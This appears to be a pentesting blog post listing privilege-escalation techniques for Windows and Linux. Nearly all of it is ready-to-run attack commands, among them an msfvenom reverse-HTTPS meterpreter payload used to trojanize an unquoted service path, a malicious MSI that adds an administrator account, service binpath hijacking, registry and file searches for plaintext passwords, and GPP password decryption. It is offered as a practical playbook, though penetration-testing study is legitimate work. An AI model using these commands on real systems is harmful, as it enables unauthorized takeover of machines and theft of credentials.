✅ 17 techniques for Privilege Escalation in Windows and Linux

Learn several methods for privilege escalation

Windows Privilege Escalation Methods

Method #1: Metasploit getsystem (From local admin to SYSTEM)

To escalate privileges from local administrator to SYSTEM user:

meterpreter> use priv
meterpreter> getsystem

getsystem uses three methods to achieve that, the first two using named pipe impersonation and the third one, using token duplication.


Method #2: Unquoted Service Paths

It happens when when a developer fails to enclose the file path to a service with quotes. File paths that are properly quoted are treated as absolute and therefore mitigate this vulnerability.


C:\Program Files\Some Folder\Config files\Service.exe

Windows would try to execute:

C:\Program Files\Some.exe
C:\Program Files\Some Folder\Config.exe
C:\Program Files\Some Folder\Config files\Service.exe

So if we have write access on some target directory we can write a file on that directory:

icacls "C:\Program Files\Some Folder"

Search for: BUILTIN\Users: (OI) (CI) (M)

(M) stands for Modify access for (unprivileged) users

Use the below command for more info related to the icacls command:

icacls /?

To know in which privileges is the service running (hopefully as SYSTEM):

wmic service get name,startname

Then we can trojanize the service using Metasploit msfvenom tool:

msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=$IP LPORT=443 -f exe -o Config.exe

And copy it to the folder we can write in:

copy Config.exe C:\Program Files\Some Folder\

And sit and wait to the machine to be rebooted OR:

shutdown /r /t 0

From a metasploit session:

msf> use exploit/windows/local/trusted_service_path

To exploit it manually:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

sc $SERVICENAME stop & sc $SERVICENAME start

Method #3: Tokens

Take advantage of:

  • SeImpersonatePrivilege

  • SeAssignPrimaryPrivilege

Reference: https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/

Method #4: Hardcoded credentials

As easy as try to find plain text passwords left in the system (i.e. in txt files, backup files, sql dumps, config files, …)


dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

Method #5: Sensitive files on Desktop, Documents (xls, txt, )

Take a look to the link below to find commands to search for sensitive files and information as well:

Learn Pentesting like a Pro
🥷 The Art of Pentesting: Post-exploitation like an APT
Linux Post-exploitation Check wrong permissions: Find setuid binaries: find / -perm -4000 -ls 2> /dev/null Find files world writable: find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null Find directories world writable…
Read more

Method #6: DLL injection / hijacking

Trusted directories to inject on:




Method #7: Unattended installation files (Unattend.xml)

  • Unattended installs that were not cleaned properly can be abused.

  • Mainly in those directories:

dir C:\Windows\Panther\

dir C:\Windows\Panther\Unattend\

dir C:\Windows\System32\

dir C:\Windows\System32\sysprep\

In addition to Unattend.xml files, be on the lookout for sysprep.xml and sysprep.inf

Using metasploit:

msf> use post/windows/gather/enum_unattend

Method #8: GPP cracking

Group Policy Preferences (GPP) let you control computers in a number of ways. Think of them as unmanaged settings for your computers and users. It can be used also to set up accounts and/or passwords through the domain (i.e. same Administrator password to all the workstations of the domain).

These Group policy configuration files that could contain passwords (Groups.xml) are “encrypted” using a known AES key. And found in a shared folder inside the domain controller with read access to all domain authenticated users.

net use z: \\$IP\SYSVOL

SYSVOL is simply a folder which resides on each and every domain controller within the domain. It contains the domains public files that need to be accessed by clients and kept synchronised between domain controllers. The default location for the SYSVOL is C:\Windows\SYSVOL although it can be moved to another location during the promotion of a domain controller. It’s possible but not recommended to relocate the SYSVOL after DC promotion as there is potential for error. The SYSVOL folder can be accessed through its share \domainname.com\sysvol or the local share name on the server \servername\sysvol.

SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access.

By default there are two folders with a GUID name under ‘’C:\Windows\SYSVOL\domain\policies’’, representing two group policies (GPO). In any new domain environment we always get two default GPO’s, Default Domain Policy and Domain Controllers Policy.

To update your GPOs:


To look your current assigned GPOs:

gpresult /R
dir /s Groups.xml

Other attack vector, more direct:

findstr /S /I cpassword \\$FQDN\sysvol\$FQDN\policies\*.xml

Once we get the hashed password:

In Linux:

gpp-decrypt $AES_PASSWORD

In Windows, use PowerSploit function Get-GPPPassword:

Get-DecryptedCpassword $AES_PASSWORD


Method #9: Weak services and bad permissions

Use AccessChk from sysinternals

Which Services can be modified by any authenticated user (regardless of privilege level):

accesschk.exe -uwcqv "Authenticated Users" * /accepteula

List service parameters:

accesschk.exe -ucqv $SERVICENAME

Find all weak folder permissions per drive:

accesschk.exe -uwdqs Users c:\

accesschk.exe -uwdqs "Authenticated Users" c:\

Find all weak file permissions per drive:

accesschk.exe -uwqs Users c:\*.*

accesschk.exe -uwqs "Authenticated Users" c:\*.*

Permissions on a specific folder:

accesschk.exe Builtin\Users c:\inetpub

Look at vulnerable service configuration parameters

sc qc $SERVICE

Locate interesting parameter, this is only an example

sc config $SERVICE binpath="net user alien alien /add"

sc stop $SERVICE

sc start $SERVICE

From metasploit (post module):

msf> use exploit/windows/local/service_permissions

Method #10: AlwaysInstallElevated ON

Allows any MSI executable be run as SYSTEM.

Manual method:

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Using Metasploit:

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o rotten.msi

msiexec /quiet /qn /i C:\Users\$USER\Downloads\rotten.msi

Another method with metasploit:
If the machine has the AlwaysInstallElevated registry flag on, then just:

msf> use exploit/windows/local/always_install_elevated

Method #11: Abusing scheduled tasks

schtasks /query /fo LIST /v
tasklist /SVC

Method #12: Local exploits

msf> use exploit/windows/local/*


Linux Privilege Escalation Methods

Most common techniques for privilege escalation in Linux environments:

Method #1: Find setuids

Sometimes in CTFs there are trojans hidden in the system with the setuid set. Look for any of those using find command:

find / -perm -4000 -ls 2> /dev/null

Method #2: Find world writable directories

find / -perm -777 -type d -ls 2> /dev/null

Method #3: Find world readable logs or backups

Many times Linux is very restrictive with the default permissions BUT sometimes sysadmins do not protect properly system backups, so you can easily extract sensitive system files such as /etc/passwd. Look for gz, tar o zip files is definitely worth it.

find / -name "*.[gz,tar,zip]" 2> /dev/null

Method #4: Check crontab tasks

Added scheduled tasks may contain some misconfigurations like for example, one script is run by root and it is writable for everybody

crontab -l
ls -lR /etc/cron*

Method #5: Local exploits for kernel or applications

As part of your local enumeration information gathering, look for kernel versions, applications installed, daemons running in order to detect any old version with known exploits.

Thanks for reading Learn Pentesting like a Pro! Subscribe for free to receive new posts.






Leave a Reply

Your email address will not be published. Required fields are marked *